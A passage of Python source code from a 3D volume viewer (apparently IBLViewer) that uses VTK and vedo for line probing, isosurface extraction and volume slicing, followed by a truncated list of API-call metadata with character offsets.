Update a probe with given start and end points
:param origin: Start point
:param destination: End point
:param points_obj: Points object
"""
resolution = points_obj._polydata.GetPoints().GetNumberOfPoints()
positions, values = self.probe(origin, destination, resolution)
points_obj.update_data(positions, values)
def probe(self, origin, destination, resolution=40):
"""
Probe a volume with a line
:param origin: Origin of the line probe
:param destination: Destination of the line probe
:param resolution: Number of point samples along the probe
:return: Positions and values
"""
origin = np.array(origin)
destination = np.array(destination)
distance = np.linalg.norm(destination - origin)
ray = destination - origin
ray_norm = ray / distance
step = distance / resolution
positions = [origin + ray_norm * p_id * step for p_id in range(resolution)]
values = np.array([self.get_value_from_xyz(point, none_as_zero=True) for point in positions])
return positions, values
def set_interactive_subsampling(self, on=False):
"""
Set volume subsampling on or off.
This is enabled by default in VTK and we disable it by default in IBLViewer
:param on: Whether volume subsampling in interactive mode is on or off
"""
#self.plot.window.SetDesiredUpdateRate(0)
#self.actor._mapper.SetInteractiveUpdateRate(0)
self.model.interactive_subsampling = on
self.actor._mapper.SetAutoAdjustSampleDistances(on)
if on:
self.actor._mapper.InteractiveAdjustSampleDistancesOn()
else:
self.actor._mapper.InteractiveAdjustSampleDistancesOff()
def isosurface(self, label, exceptions=[0], force_rebuild=False, set_current=True, to_int=True, split_meshes=True):
"""
Creates a surface mesh (isosurface) of a segmented/labelled volume for the given value.
Unlike general isosurfacing, this method extracts only the surface mesh of the
desired region/label/segmentation, not of all values from 0 to label.
:param label: Label (scalar) value found in the volume
:param exceptions: If the label is found in the exceptions list, isosurfacing will not occur
:param force_rebuild: Whether rebuilding is forced in case we find an existing mesh for the given label
:param set_current: Whether the label is set as the current one in the model
:param to_int: Whether the label is cast to integer
:param split_meshes: Whether we split meshes when multiple ones are found
:return: A list of all manifold meshes for the given label
"""
if label is None or label in exceptions:
return
if to_int:
label = int(label)
existing_meshes = self.model.isosurfaces.get(label)
if existing_meshes is not None and not force_rebuild:
return existing_meshes
lut = self.model.luts.current
simple_lut = vtk.vtkLookupTable()
simple_lut.SetNumberOfColors(1)
simple_lut.SetTableRange(0, 1)
simple_lut.SetScaleToLinear()
simple_lut.SetTableValue(0, 0, 0, 0, 0)
simple_lut.SetTableValue(1, *lut.mapped_lut.GetTableValue(label))
simple_lut.Build()
# Generate object boundaries from labelled volume
discrete = vtk.vtkDiscreteMarchingCubes()
discrete.SetInputData(self.actor.imagedata())
discrete.GenerateValues(1, label, label)
smoothing_iterations = 15
pass_band = 0.001
feature_angle = 120.0
smoother = vtk.vtkWindowedSincPolyDataFilter()
smoother.SetInputConnection(discrete.GetOutputPort())
smoother.SetNumberOfIterations(smoothing_iterations)
smoother.BoundarySmoothingOff()
smoother.FeatureEdgeSmoothingOff()
smoother.SetFeatureAngle(feature_angle)
smoother.SetPassBand(pass_band)
smoother.NonManifoldSmoothingOn()
smoother.NormalizeCoordinatesOn()
smoother.Update()
self.model.isosurfaces[label] = []
#splitter = vtk.vtkExtractPolyDataGeometry()
if split_meshes:
splitter = vtk.vtkPolyDataConnectivityFilter()
splitter.SetInputConnection(smoother.GetOutputPort())
splitter.SetExtractionModeToAllRegions()
splitter.ColorRegionsOn()
splitter.Update()
for region_id in range(splitter.GetNumberOfExtractedRegions()):
#splitter.AddSpecifiedRegion(region_id)
#splitter.Update()
#poly = vtk.vtkPolyData()
#poly.ShallowCopy(splitter.GetOutput())
threshold = vtk.vtkThreshold()
threshold.SetInputConnection(splitter.GetOutputPort())
threshold.ThresholdBetween(region_id, region_id)
threshold.Update()
actor = vedo.Mesh(threshold.GetOutput())
#actor._mapper.SetScalarRange(min_value, lut.scalar_max)
#actor._mapper.SetUseLookupTableScalarRange(True)
actor._mapper.SetLookupTable(simple_lut)
actor._mapper.ScalarVisibilityOn()
actor.name = 'Isosurface_' + str(label)
self.model.isosurfaces[label].append(actor)
#actor.cmap(lut.scalar_lut, np.ones(poly.GetNumberOfVerts())*label)
else:
poly = smoother.GetOutput()
actor = vedo.Mesh(poly)
actor._mapper.SetLookupTable(simple_lut)
actor._mapper.ScalarVisibilityOn()
actor.name = 'Isosurface_' + str(label)
self.model.isosurfaces[label].append(actor)
'''
pdnorm = vtk.vtkPolyDataNormals()
pdnorm.SetInputData(smoother.GetOutput())
pdnorm.ComputePointNormalsOn()
pdnorm.ComputeCellNormalsOn()
pdnorm.FlipNormalsOff()
pdnorm.ConsistencyOn()
pdnorm.Update()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(smoother.GetOutputPort())
mapper.SetLookupTable(lut.scalar_lut)
mapper.SetScalarRange(min_value, lut.scalar_max)
'''
if set_current:
self.model.isosurfaces.set_current(label)
return self.model.isosurfaces[label]
@dataclass
class SlicerModel:
PREFIX = '[Slicer]_'
MIN_SLAB_THICKNESS = 1.0 #um
__count = 0
def unique_name():
SlicerModel.__count += 1
return f'{SlicerModel.PREFIX}_{SlicerModel.__count}'
name: str = field(default_factory=unique_name)
# 0, 1 or 2. See the normal for axis orientation
axis: int = None
value: float = 0.0
bounds: np.ndarray = None
#thickness: float = 0.0
origin: np.ndarray = np.array([0.0, 0.0, 0.0])
normal: np.ndarray = np.array([1.0, 0.0, 0.0])
clipping_planes: vtk.vtkPlaneCollection = None
def get_box_plane_id(self):
"""
Get the plane id
:return: Int
"""
if self.axis is None:
return
offset = 0 if self.normal[self.axis] < 0 else 1
return self.axis * 2 + offset
def get_axis_aligned_info(self, vtk_axis):
"""
VTK stores box clipping planes in the order:
-X to +X: 0, 1
-Y to +Y: 2, 3
-Z to +Z: 4, 5
This method retrieves what is the XYZ axis (0, 1 or 2)
and its orientation sign
:return: Int axis and float orientation
"""
orientation = -1.0 if vtk_axis % 2 == 0 else 1.0
axis = (vtk_axis - vtk_axis % 2) // 2
return axis, orientation
def align_to_axis(self, axis, dimensions=None):
"""
Set the axis of the slicer
:param axis: See parameter vtk_axis in SlicerModel.get_axis_aligned_info()
:param dimensions: Dimensions of the volume
"""
if not isinstance(axis, int):
return
normal = np.zeros(3).astype(float)
xyz_axis, orientation = self.get_axis_aligned_info(axis)
normal[xyz_axis] = orientation
self.axis = xyz_axis
if dimensions is not None and orientation < 0:
self.origin = np.zeros(3)
self.origin[xyz_axis] = dimensions[xyz_axis]
self.normal = normal
def flip_normal(self):
"""
Flip the normal of the slicer
"""
self.normal *= -1.0
self.check_normal()
if isinstance(self.axis, int):
self.axis *= -1
def check_normal(self):
"""
Check if the normal is axis-aligned.
If not, the axis is set to None.
"""
zeros = self.normal == 0
if len(self.normal[zeros]) >= 2:
self.axis = 0
def update(self, value=None, normal=None, axis=None):
"""
Update slicer
:param value: Origin of the slicing plane
:param normal: Normal of the slicing plane
:param axis: Axis, if the plane is axis-aligned
:return: True if model changed, False if it didn't
"""
if not(isinstance(value, int) or isinstance(value, float)):
if normal is None:
normal = self.normal
if normal is None:
return False
if normal[1] == 0 and normal[2] == 0:
axis = 0 #if normal[0] > 0 else 1
elif normal[0] == 0 and normal[2] == 0:
axis = 1 #if normal[1] > 0 else 1
elif normal[0] == 0 and normal[1] == 0:
axis = 2 #if normal[2] > 0 else 1
if axis is not None:
value = value[axis]
if axis is None:
axis = self.axis
if self.value == value:
return False
if axis is not None:
self.value = value
self.origin = np.array(normal) * value
else:
self.value = None
self.origin = value
self.normal = normal
self.axis = axis
return True
class SlicerView():
slices = {}
def __init__(self, plot, volume_view, slicer_model, standalone=True):
"""
Constructor
:param plot: Plot instance
:param volume_view: VolumeView instance
:param slicer_model: SlicerModel instance
:param standalone: Whether the slice is a standalone actor that
can be clicked. Set this to False if you want to use transparency,
at the expense that because of a VTK bug, you won't be able to
click on it anymore, requiring you to code another way of detecting
where the user clicked. See more in initialize_mapper()
"""
self.plot = plot
self.volume_view = volume_view
self.model = slicer_model
self.actor = None
self.filter = None
self.filter = None
self.actor = None
self.reslice = None
self.slice_type = -1
self.depth_peeling_enabled = None
self.standalone = standalone
self.got_slice = False
self.color_map = None
self.alpha_map = None
self.initialize()
def initialize(self, render=False):
"""
Initialize the slicer object
"""
if self.filter is None:
self.filter = vtk.vtkImageDataGeometryFilter()
if self.actor is None:
self.actor = vedo.Mesh(self.filter.GetOutput())
# Adding empty actor so that it's updated later on
self.plot.add(self.actor, render=render)
self.actor.lighting('off')
self.actor.name = self.model.name
self.initialize_mapper()
def initialize_mapper(self):
"""
Initialize the object mapper
"""
mapper = self.actor._mapper
mapper.SetScalarModeToUsePointData() #SetScalarModeToUsePointFieldData
mapper.SetColorModeToMapScalars()
mapper.ScalarVisibilityOn()
# We operate on static volumes thanks to the double LUT mapping implemented here
mapper.SetStatic(True)
# Without using scalar range, the mapping will be off
mapper.SetUseLookupTableScalarRange(True)
# We prevent this actor from being pickable as a result of the bug described below
# when we want to use transparency on the slice.
self.actor.pickable(self.standalone)
if self.standalone:
# There is a bug in VTK 9 that prevents clicking on transparent objects
# as reported on vedo's tracker https://github.com/marcomusy/vedo/issues/291
# The "Force opaque fix" below should be gone with the next VTK update hopefully.
# In the meantime, we use this.
# TODO: remove this when this bug is fixed in VTK
self.actor.ForceOpaqueOn()
else:
# We bypass the transparent selection bug when a VolumeView has multiple slicers
# like in box mode because the click detection occurs on the volume and we perform
# an additional test to see if a slicer yields a nearby result. If it does,
# the result is like clicking on the slice and we get transparency for free.
pass
# Make sure we have depth peeling activated, otherwise transparency with volumes
# will look weird and in the wrong order
self.plot.renderer.UseDepthPeelingOn()
self.plot.renderer.UseDepthPeelingForVolumesOn()
segmented = self.volume_view.model.is_segmented()
if segmented:
# This very line below will mess up the entire slice coloring if:
# - you have a segmented volume and this is set to True
# - you have a non-segmented (like raw MRI, CT) volume and this is set to False
mapper.SetInterpolateScalarsBeforeMapping(not segmented)
mapper.Update()
def set_color_map(self, color_map, alpha_map=None):
"""
Set a color map to the slice
:param color_map: Color map, can be a string, a list of colors or more.
See vedo documentation.
"""
self.color_map = color_map
if alpha_map is not None:
self.alpha_map = alpha_map
if self.got_slice and color_map is not None:
self.actor.cmap(self.color_map, alpha=self.alpha_map)
def set_slice_type(self, slice_type):
"""
Set the slice type. 0 for axial, 1 for free slicing
:param slice_type: Int value
"""
if slice_type == 0 and self.slice_type != slice_type:
self.slice_type = slice_type
self.filter.SetInputData(self.volume_view.actor.imagedata())
elif slice_type == 1 and self.slice_type != slice_type:
self.slice_type = slice_type
self.filter.SetInputData(self.reslice.GetOutput())
def slice_on_normal(self, origin, normal):
"""
Slice a volume with a plane oriented by the given normal.
This allows slicing in all directions.
:param origin: Origin of the slicing plane
:param normal: Normal of the slicing plane
:return: Mesh object with the slice as an image texture
"""
'''
mapper = vtk.vtkImageResliceMapper()
mapper.SetInputData(self.volume_view.actor._data)
mapper.SliceFacesCameraOff()
mapper.SliceAtFocalPointOff()
mapper.JumpToNearestSliceOn()
mapper.SetImageSampleFactor(2)
mapper.BorderOn()
mapper.BackgroundOff()
mapper.UpdateInformation()
mapper.GetSlicePlane().SetOrigin(*origin)
mapper.GetSlicePlane().SetNormal(*normal)
mapper.GetSlicePlane().Modified()
mapper.Modified()
mapper.Update()
self.actor = vtk.vtkImageSlice()
self.actor.SetMapper(mapper)
prop = vtk.vtkImageProperty()
if True:
prop.SetInterpolationTypeToLinear()
else:
prop.SetInterpolationTypeToNearest()
self.actor.SetProperty(prop)
return
'''
if self.reslice is None:
reslice = vtk.vtkImageReslice()
reslice.SetInputData(self.volume_view.actor._data)
#reslice.SetInputData(image)
reslice.SetOutputDimensionality(2)
reslice.SetAutoCropOutput(False)
#reslice.SetInterpolationModeToLinear()
reslice.SetInterpolationModeToNearestNeighbor()
reslice.SetSlabNumberOfSlices(1)
reslice.SetOutputSpacing(self.volume_view.get_spacing())
reslice.ReleaseDataFlagOn()
self.reslice = reslice
self.set_slice_type(1)
M, T = utils.get_transformation_matrix(origin, normal)
self.reslice.SetResliceAxes(M)
self.reslice.Update()
self.filter.Update()
if self.actor is None:
self.actor = vedo.Mesh(self.filter.GetOutput())
self.initialize_mapper()
else:
self.actor._update(self.filter.GetOutput())
self.initialize_mapper()
self.actor.SetOrientation(T.GetOrientation())
self.actor.SetPosition(origin)
self.got_slice = True
return self.actor
def x_slice(self, i):
"""
Extract the slice at index `i` of volume along x-axis.
:param i: I index
"""
self.set_slice_type(0)
nx, ny, nz = self.volume_view.actor.GetMapper().GetInput().GetDimensions()
if i <= 1 or i > nx - 1:
return False
self.filter.SetExtent(i, i, 0, ny, 0, nz)
self.filter.Update()
if self.actor is not None:
self.actor._update(self.filter.GetOutput())
else:
self.actor = vedo.Mesh(self.filter.GetOutput())
self.initialize_mapper()
self.got_slice = True
return True
def y_slice(self, j):
"""
Extract the slice at index `j` of volume along y-axis.
:param j: J index
"""
self.set_slice_type(0)
#nx, ny, nz = self.volume_view.model.dimensions / resolution
nx, ny, nz = self.volume_view.actor.GetMapper().GetInput().GetDimensions()
if j <= 1 or j > ny - 1:
return False
self.filter.SetExtent(0, nx, j, j, 0, nz)
self.filter.Update()
if self.actor is not None:
self.actor._update(self.filter.GetOutput())
else:
self.actor = vedo.Mesh(self.filter.GetOutput())
self.initialize_mapper()
self.got_slice = True
return True
def z_slice(self, k):
"""
Extract the slice at index `k` of volume along z-axis.
:param k: K index
"""
self.set_slice_type(0)
nx, ny, nz = self.volume_view.actor.GetMapper().GetInput().GetDimensions()
if k <= 1 or k > nz - 1:
return False
self.filter.SetExtent(0, nx, 0, ny, k, k)
self.filter.Update()
if self.actor is not None:
self.actor._update(self.filter.GetOutput())
else:
self.actor = vedo.Mesh(self.filter.GetOutput())
self.initialize_mapper()
self.got_slice = True
return True
def slice_on_axis(self, value=None, normal=None, axis=None, use_reslice=False):
"""
Slice on standard X, Y or Z axis
:param value: Value on the given axis
:param normal: Axis normal, can be either +1.0 or -1.0 along that axis
:param axis: Axis integer, 0 for X, 1 for Y, 2 for Z
:param use_reslice: if True, this enables vtkImageReslice which is useful when
the normal is not aligned to either X, Y or Z. If you use it on an axis-aligned
normal, some color inaccuracies will appear if you don't tweak the vtkImageResliceMapper.
This is why the default is False.
:return: Result boolean, whether slice occured or not
"""
resolution = self.volume_view.model.resolution
volume_dimensions = self.volume_view.model.dimensions
'''
if normal[axis] < 0:
if value > 0:
# Make value consistent with given normal.
value *= normal[axis]
value = volume_dimensions[axis] + value
'''
in_volume_slice = int(value) // resolution
if use_reslice:
self.slice_on_normal(normal * value, normal)
return
if axis == 0:
result = self.x_slice(in_volume_slice)
elif axis == 1:
result = self.y_slice(in_volume_slice)
elif axis == 2:
result = self.z_slice(in_volume_slice)
return result
def update(self):
"""
Update slice object according to data in the model
"""
had_slice = self.got_slice
result = True
if isinstance(self.model.axis, int) and 0 <= self.model.axis <= 2:
result = self.slice_on_axis(self.model.value, self.model.normal, self.model.axis)
else:
self.slice_on_normal(self.model.origin, self.model.normal)
if not result:
self.plot.remove(self.actor)
self.got_slice = False
return
#self.actor.pos(*(self.volume_view.actor.pos()-self.actor.pos()))
lut = self.volume_view.model.luts.current
if lut is not None:
'''
This is VTK for you...a mesh can use a vtkLookupTable for RGBA mapping
BUT volumes require vtkColorTransferFunction (RGB) and vtkPiecewiseFunction (alpha)
So we have to put a color map, alpha map and a vtkLookupTable
built from both maps in a LUTModel.
Alternatively, we could update the LUT with alpha values but it's a pain.
ctf = self.volume_view.actor.GetProperty().GetRGBTransferFunction()
lut = vedo.utils.ctf2lut(self.volume_view.actor)
otf = self.volume_view.actor.GetProperty().GetScalarOpacity
# using "ctf" would work only for colors, not for transparency!
self.apply_lut(ctf)
'''
self.apply_lut(lut.mapped_lut)
else:
if self.alpha_map is None:
self.actor.cmap(self.color_map)
else:
self.actor.cmap(self.color_map, alpha=self.alpha_map)
if self.model.clipping_planes is not None:
self.actor.mapper().SetClippingPlanes(self.model.clipping_planes)
if not had_slice:
self.plot.add(self.actor, render=True)
def apply_lut(self, lut=None):
"""
Apply a LUT to the volume
:param lut: vtkLookupTable
:param actor: The actor to receive this
"""
if self.actor is None or lut is None:
return
mapper = self.actor._mapper
mapper.SetLookupTable(lut) | [
"vedo.colors.getColor",
"numpy.random.rand",
"iblviewer.utils.get_transformation_matrix",
"nrrd.read",
"vtk.vtkPlane",
"iblviewer.objects.Points",
"vtk.vtkImageAppend",
"numpy.array",
"vedo.io.loadImageData",
"vtk.vtkImageReslice",
"vedo.colorMap",
"numpy.linalg.norm",
"vedo.loadImageData",
"logging.info",
"os.path.exists",
"vedo.download",
"iblviewer.utils.change_file_name",
"vtk.vtkDiscreteMarchingCubes",
"numpy.max",
"numpy.linspace",
"numpy.min",
"iblviewer.utils.time_diff",
"numpy.maximum",
"vtk.vtkPiecewiseFunction",
"vtk.vtkPlanes",
"dataclasses.field",
"glob.glob",
"collections.OrderedDict",
"vtk.vtkLookupTable",
"vtk.vtkVolumePicker",
"numpy.ones",
"vedo.colors.printc",
"vtk.vtkWindowedSincPolyDataFilter",
"vtk.vtkImageDataGeometryFilter",
"vtk.vtkGPUVolumeRayCastMapper",
"os.path.isfile",
"vtk.vtkImageMagnitude",
"vtk.vtkPlaneCollection",
"vtk.vtkImageData",
"vedo.utils.isSequence",
"vtk.vtkBMPReader",
"numpy.transpose",
"pandas.Series",
"nrrd.write",
"vtk.vtkVolume.__init__",
"numpy.ones_like",
"vtk.vtkFixedPointVolumeRayCastMapper",
"numpy.unique",
"numpy.minimum",
"vtk.vtkPolyDataConnectivityFilter",
"vedo.io.download",
"vtk.vtkThreshold",
"datetime.datetime.now",
"numpy.zeros",
"vedo.numpy2vtk",
"vedo.BaseGrid.__init__",
"vtk.vtkSmartVolumeMapper",
"vtk.vtkOpenGLGPUVolumeRayCastMapper",
"vedo.Mesh"
]
| [((753, 787), 'dataclasses.field', 'field', ([], {'default_factory': 'unique_name'}), '(default_factory=unique_name)\n', (758, 787), False, 'from dataclasses import dataclass, field\n'), ((841, 874), 'dataclasses.field', 'field', ([], {'default_factory': 'Collection'}), '(default_factory=Collection)\n', (846, 874), False, 'from dataclasses import dataclass, field\n'), ((892, 933), 'dataclasses.field', 'field', ([], {'default_factory': '(lambda : [1, 1, 1])'}), '(default_factory=lambda : [1, 1, 1])\n', (897, 933), False, 'from dataclasses import dataclass, field\n'), ((1442, 1475), 'dataclasses.field', 'field', ([], {'default_factory': 'Collection'}), '(default_factory=Collection)\n', (1447, 1475), False, 'from dataclasses import dataclass, field\n'), ((1502, 1535), 'dataclasses.field', 'field', ([], {'default_factory': 'Collection'}), '(default_factory=Collection)\n', (1507, 1535), False, 'from dataclasses import dataclass, field\n'), ((1566, 1599), 'dataclasses.field', 'field', ([], {'default_factory': 'Collection'}), '(default_factory=Collection)\n', (1571, 1599), False, 'from dataclasses import dataclass, field\n'), ((55813, 55847), 'dataclasses.field', 'field', ([], {'default_factory': 'unique_name'}), '(default_factory=unique_name)\n', (55818, 55847), False, 'from dataclasses import dataclass, field\n'), ((56028, 56053), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (56036, 56053), True, 'import numpy as np\n'), ((56079, 56104), 'numpy.array', 'np.array', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (56087, 56104), True, 'import numpy as np\n'), ((2599, 2616), 'numpy.min', 'np.min', (['self.data'], {}), '(self.data)\n', (2605, 2616), True, 'import numpy as np\n'), ((2641, 2658), 'numpy.max', 'np.max', (['self.data'], {}), '(self.data)\n', (2647, 2658), True, 'import numpy as np\n'), ((6526, 6556), 'numpy.transpose', 'np.transpose', (['self.data', 'shape'], {}), '(self.data, shape)\n', (6538, 6556), True, 'import numpy as np\n'), ((7033, 7107), 'logging.info', 'logging.info', (['"""\nBuilding appropriate volume from Allen data source..."""'], {}), '("""\nBuilding appropriate volume from Allen data source...""")\n', (7045, 7107), False, 'import logging\n'), ((10414, 10442), 'vtk.vtkVolume.__init__', 'vtk.vtkVolume.__init__', (['self'], {}), '(self)\n', (10436, 10442), False, 'import vtk\n'), ((10451, 10479), 'vedo.BaseGrid.__init__', 'vedo.BaseGrid.__init__', (['self'], {}), '(self)\n', (10473, 10479), False, 'import vedo\n'), ((19031, 19051), 'vtk.vtkLookupTable', 'vtk.vtkLookupTable', ([], {}), '()\n', (19049, 19051), False, 'import vtk\n'), ((19073, 19093), 'vtk.vtkLookupTable', 'vtk.vtkLookupTable', ([], {}), '()\n', (19091, 19093), False, 'import vtk\n'), ((24790, 24803), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (24801, 24803), False, 'from collections import OrderedDict\n'), ((33103, 33124), 'vtk.vtkVolumePicker', 'vtk.vtkVolumePicker', ([], {}), '()\n', (33122, 33124), False, 'import vtk\n'), ((35001, 35025), 'vtk.vtkPlaneCollection', 'vtk.vtkPlaneCollection', ([], {}), '()\n', (35023, 35025), False, 'import vtk\n'), ((35661, 35685), 'vtk.vtkPlaneCollection', 'vtk.vtkPlaneCollection', ([], {}), '()\n', (35683, 35685), False, 'import vtk\n'), ((38045, 38060), 'vtk.vtkPlanes', 'vtk.vtkPlanes', ([], {}), '()\n', (38058, 38060), False, 'import vtk\n'), ((38523, 38538), 'vtk.vtkPlanes', 'vtk.vtkPlanes', ([], {}), '()\n', (38536, 38538), False, 'import vtk\n'), ((46463, 46482), 'numpy.linalg.norm', 'np.linalg.norm', (['ray'], {}), '(ray)\n', (46477, 46482), True, 'import numpy as np\n'), ((48549, 48679), 'iblviewer.objects.Points', 'obj.Points', (['positions'], {'values': 'values', 'radius': 'radius', 'screen_space': 'screen_space', 'color_map': 'color_map', 'min_v': 'min_v', 'max_v': 'max_v'}), '(positions, values=values, radius=radius, screen_space=\n screen_space, color_map=color_map, min_v=min_v, max_v=max_v)\n', (48559, 48679), True, 'import iblviewer.objects as obj\n'), ((49805, 49821), 'numpy.array', 'np.array', (['origin'], {}), '(origin)\n', (49813, 49821), True, 'import numpy as np\n'), ((49844, 49865), 'numpy.array', 'np.array', (['destination'], {}), '(destination)\n', (49852, 49865), True, 'import numpy as np\n'), ((49885, 49921), 'numpy.linalg.norm', 'np.linalg.norm', (['(destination - origin)'], {}), '(destination - origin)\n', (49899, 49921), True, 'import numpy as np\n'), ((52223, 52243), 'vtk.vtkLookupTable', 'vtk.vtkLookupTable', ([], {}), '()\n', (52241, 52243), False, 'import vtk\n'), ((52589, 52619), 'vtk.vtkDiscreteMarchingCubes', 'vtk.vtkDiscreteMarchingCubes', ([], {}), '()\n', (52617, 52619), False, 'import vtk\n'), ((52834, 52869), 'vtk.vtkWindowedSincPolyDataFilter', 'vtk.vtkWindowedSincPolyDataFilter', ([], {}), '()\n', (52867, 52869), False, 'import vtk\n'), ((65918, 65965), 'iblviewer.utils.get_transformation_matrix', 'utils.get_transformation_matrix', (['origin', 'normal'], {}), '(origin, normal)\n', (65949, 65965), True, 'import iblviewer.utils as utils\n'), ((1768, 1779), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (1776, 1779), True, 'import numpy as np\n'), ((1819, 1830), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (1827, 1830), True, 'import numpy as np\n'), ((2001, 2026), 'numpy.array', 'np.array', (['self.data.shape'], {}), '(self.data.shape)\n', (2009, 2026), True, 'import numpy as np\n'), ((3901, 3940), 'vedo.download', 'vedo.download', (['file_path'], {'verbose': '(False)'}), '(file_path, verbose=False)\n', (3914, 3940), False, 'import vedo\n'), ((5186, 5200), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5198, 5200), False, 'from datetime import datetime\n'), ((5229, 5305), 'iblviewer.utils.change_file_name', 'utils.change_file_name', (['file_path', 'None', 'None', 'VolumeModel.NORMALIZED_SUFFIX'], {}), '(file_path, None, None, VolumeModel.NORMALIZED_SUFFIX)\n', (5251, 5305), True, 'import iblviewer.utils as utils\n'), ((5321, 5350), 'os.path.exists', 'os.path.exists', (['new_file_path'], {}), '(new_file_path)\n', (5335, 5350), False, 'import os\n'), ((7175, 7190), 'numpy.unique', 'np.unique', (['data'], {}), '(data)\n', (7184, 7190), True, 'import numpy as np\n'), ((7275, 7292), 'pandas.Series', 'pd.Series', (['labels'], {}), '(labels)\n', (7284, 7292), True, 'import pandas as pd\n'), ((7976, 8030), 'logging.info', 'logging.info', (["('Saving volume data under ' + write_path)"], {}), "('Saving volume data under ' + write_path)\n", (7988, 8030), False, 'import logging\n'), ((8043, 8088), 'nrrd.write', 'nrrd.write', (['write_path', 'data'], {'index_order': '"""C"""'}), "(write_path, data, index_order='C')\n", (8053, 8088), False, 'import nrrd\n'), ((10953, 10984), 'vtk.vtkGPUVolumeRayCastMapper', 'vtk.vtkGPUVolumeRayCastMapper', ([], {}), '()\n', (10982, 10984), False, 'import vtk\n'), ((11665, 11683), 'vtk.vtkImageData', 'vtk.vtkImageData', ([], {}), '()\n', (11681, 11683), False, 'import vtk\n'), ((11698, 11729), 'vedo.utils.isSequence', 'vedo.utils.isSequence', (['inputobj'], {}), '(inputobj)\n', (11719, 11729), False, 'import vedo\n'), ((21981, 22017), 'numpy.linspace', 'np.linspace', (['s_min', 's_max', 'num_steps'], {}), '(s_min, s_max, num_steps)\n', (21992, 22017), True, 'import numpy as np\n'), ((30005, 30024), 'numpy.array', 'np.array', (['([res] * 3)'], {}), '([res] * 3)\n', (30013, 30024), True, 'import numpy as np\n'), ((43270, 43296), 'vtk.vtkPiecewiseFunction', 'vtk.vtkPiecewiseFunction', ([], {}), '()\n', (43294, 43296), False, 'import vtk\n'), ((53427, 53462), 'vtk.vtkPolyDataConnectivityFilter', 'vtk.vtkPolyDataConnectivityFilter', ([], {}), '()\n', (53460, 53462), False, 'import vtk\n'), ((54730, 54745), 'vedo.Mesh', 'vedo.Mesh', (['poly'], {}), '(poly)\n', (54739, 54745), False, 'import vedo\n'), ((57437, 57448), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (57445, 57448), True, 'import numpy as np\n'), ((60515, 60547), 'vtk.vtkImageDataGeometryFilter', 'vtk.vtkImageDataGeometryFilter', ([], {}), '()\n', (60545, 60547), False, 'import vtk\n'), ((65344, 65365), 'vtk.vtkImageReslice', 'vtk.vtkImageReslice', ([], {}), '()\n', (65363, 65365), False, 'import vtk\n'), ((4015, 4051), 'nrrd.read', 'nrrd.read', (['downloaded_temp_file_path'], {}), '(downloaded_temp_file_path)\n', (4024, 4051), False, 'import nrrd\n'), ((4093, 4138), 'vedo.loadImageData', 'vedo.loadImageData', (['downloaded_temp_file_path'], {}), '(downloaded_temp_file_path)\n', (4111, 4138), False, 'import vedo\n'), ((4227, 4264), 'nrrd.read', 'nrrd.read', (['file_path'], {'index_order': '"""C"""'}), "(file_path, index_order='C')\n", (4236, 4264), False, 'import nrrd\n'), ((4306, 4335), 'vedo.loadImageData', 'vedo.loadImageData', (['file_path'], {}), '(file_path)\n', (4324, 4335), False, 'import vedo\n'), ((10690, 10723), 'vedo.io.download', 'download', (['inputobj'], {'verbose': '(False)'}), '(inputobj, verbose=False)\n', (10698, 10723), False, 'from vedo.io import loadImageData, download\n'), ((10749, 10773), 'os.path.isfile', 'os.path.isfile', (['inputobj'], {}), '(inputobj)\n', (10763, 10773), False, 'import os\n'), ((11049, 11086), 'vtk.vtkOpenGLGPUVolumeRayCastMapper', 'vtk.vtkOpenGLGPUVolumeRayCastMapper', ([], {}), '()\n', (11084, 11086), False, 'import vtk\n'), ((20122, 20159), 'vedo.colors.getColor', 'vedo.colors.getColor', (['color_map[r_id]'], {}), '(color_map[r_id])\n', (20142, 20159), False, 'import vedo\n'), ((20184, 20199), 'numpy.array', 'np.array', (['color'], {}), '(color)\n', (20192, 20199), True, 'import numpy as np\n'), ((31135, 31177), 'numpy.linalg.norm', 'np.linalg.norm', (['(center - self.model.center)'], {}), '(center - self.model.center)\n', (31149, 31177), True, 'import numpy as np\n'), ((35150, 35164), 'vtk.vtkPlane', 'vtk.vtkPlane', ([], {}), '()\n', (35162, 35164), False, 'import vtk\n'), ((39310, 39349), 'numpy.linalg.norm', 'np.linalg.norm', (['(current_origin - origin)'], {}), '(current_origin - origin)\n', (39324, 39349), True, 'import numpy as np\n'), ((47149, 47183), 'numpy.linalg.norm', 'np.linalg.norm', (['(position - hits[0])'], {}), '(position - hits[0])\n', (47163, 47183), True, 'import numpy as np\n'), ((53962, 53980), 'vtk.vtkThreshold', 'vtk.vtkThreshold', ([], {}), '()\n', (53978, 53980), False, 'import vtk\n'), ((57197, 57208), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (57205, 57208), True, 'import numpy as np\n'), ((59074, 59090), 'numpy.array', 'np.array', (['normal'], {}), '(normal)\n', (59082, 59090), True, 'import numpy as np\n'), ((2239, 2249), 'numpy.ones', 'np.ones', (['(3)'], {}), '(3)\n', (2246, 2249), True, 'import numpy as np\n'), ((11146, 11172), 'vtk.vtkSmartVolumeMapper', 'vtk.vtkSmartVolumeMapper', ([], {}), '()\n', (11170, 11172), False, 'import vtk\n'), ((11828, 11848), 'vtk.vtkImageAppend', 'vtk.vtkImageAppend', ([], {}), '()\n', (11846, 11848), False, 'import vtk\n'), ((13049, 13067), 'vtk.vtkImageData', 'vtk.vtkImageData', ([], {}), '()\n', (13065, 13067), False, 'import vtk\n'), ((19617, 19642), 'numpy.random.rand', 'np.random.rand', (['num_steps'], {}), '(num_steps)\n', (19631, 19642), True, 'import numpy as np\n'), ((20314, 20336), 'numpy.maximum', 'np.maximum', (['color', '(0.0)'], {}), '(color, 0.0)\n', (20324, 20336), True, 'import numpy as np\n'), ((20365, 20387), 'numpy.minimum', 'np.minimum', (['color', '(1.0)'], {}), '(color, 1.0)\n', (20375, 20387), True, 'import numpy as np\n'), ((21378, 21423), 'vedo.colorMap', 'vedo.colorMap', (['value', 'color_map', 's_min', 's_max'], {}), '(value, color_map, s_min, s_max)\n', (21391, 21423), False, 